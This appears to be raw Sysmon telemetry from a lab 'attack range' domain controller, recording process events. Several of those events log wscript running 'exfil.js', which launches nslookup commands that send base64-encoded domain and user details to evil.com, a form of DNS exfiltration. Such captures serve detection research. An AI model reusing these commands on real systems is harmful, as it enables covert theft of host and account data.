14:16:07.284{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.284{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.284{2E1864BB-17A7-629A-D63D-000000005F02}63727200C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-D83D-000000005F02}2952C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.293{2E1864BB-17A7-629A-D83D-000000005F02}2952C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-D63D-000000005F02}6372C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmhqscp.tmp 2>&1 10341000x8000000000000000194520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.268{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-D73D-000000005F02}7596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.268{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-D73D-000000005F02}7596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.252{2E1864BB-17A7-629A-D73D-000000005F02}75965620C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-D63D-000000005F02}6372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.237{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D73D-000000005F02}7596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.237{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.237{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.237{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.237{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.221{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D63D-000000005F02}6372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.221{2E1864BB-17A1-629A-783D-000000005F02}55525544C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-D63D-000000005F02}6372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.234{2E1864BB-17A7-629A-D63D-000000005F02}6372C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmhqscp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.221{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfupjcz.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.183{2E1864BB-17A7-629A-D43D-000000005F02}40526556C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-D53D-000000005F02}6716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.183{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D53D-000000005F02}6716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.183{2E1864BB-17A7-629A-D33D-000000005F02}17722328C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-D53D-000000005F02}6716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.191{2E1864BB-17A7-629A-D53D-000000005F02}6716C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-D33D-000000005F02}1772C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfupjcz.tmp 2>&1 10341000x8000000000000000194500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.167{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-D43D-000000005F02}4052C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.167{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-D43D-000000005F02}4052C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.152{2E1864BB-17A7-629A-D43D-000000005F02}40526556C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-D33D-000000005F02}1772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.136{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D43D-000000005F02}4052C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.136{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D33D-000000005F02}1772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+8